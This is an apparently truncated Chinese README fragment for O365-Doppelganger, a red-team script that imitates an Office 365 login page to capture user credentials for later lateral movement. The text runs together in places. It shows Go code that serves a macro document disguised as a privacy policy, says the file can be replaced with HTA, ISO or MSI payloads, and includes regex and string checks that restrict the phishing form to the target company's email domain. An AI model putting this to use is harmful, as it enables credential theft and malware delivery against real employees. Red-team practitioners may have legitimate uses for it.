O365-Doppelganger 并非 用于替代高强度的钓鱼活动。市面上已有多个工具可执行OAuth和OTA捕获,但这并非O365-Doppelganger的目标。
O365-Doppelganger 是一个快速便捷的脚本,用于在红队行动中窃取用户凭证。此仓库是对我以往某个红队演练脚本的快速改造,我曾多次使用它来捕获凭证,并利用这些凭证生成Windows访问令牌以进行横向移动。该代码仓库主要执行以下任务:
index.html中的内容可替换为任何其他页面)。建议使用有效的证书和密钥文件(例如Let's Encrypt?),而非本目录中提供的文件MacroFile.doc 的文件替换为HTA、ISO、MSI或钓鱼者希望的其他文件即可。Go代码中还有一小段代码需要修改,以指定需要返回的用户文件名:content, err := ioutil.ReadFile("MacroFile.doc")response.Header().Set("Content-Disposition", "attachment; filename=Darkvortex Privacy Policy.doc")pattern="^([a-zA-Z0-9_\-\.]+)@darkvortex\.([a-zA-Z]{2,5})$" title=" Valid darkvortex email ID"
if strings.Contains(value[i], "@darkvortex") {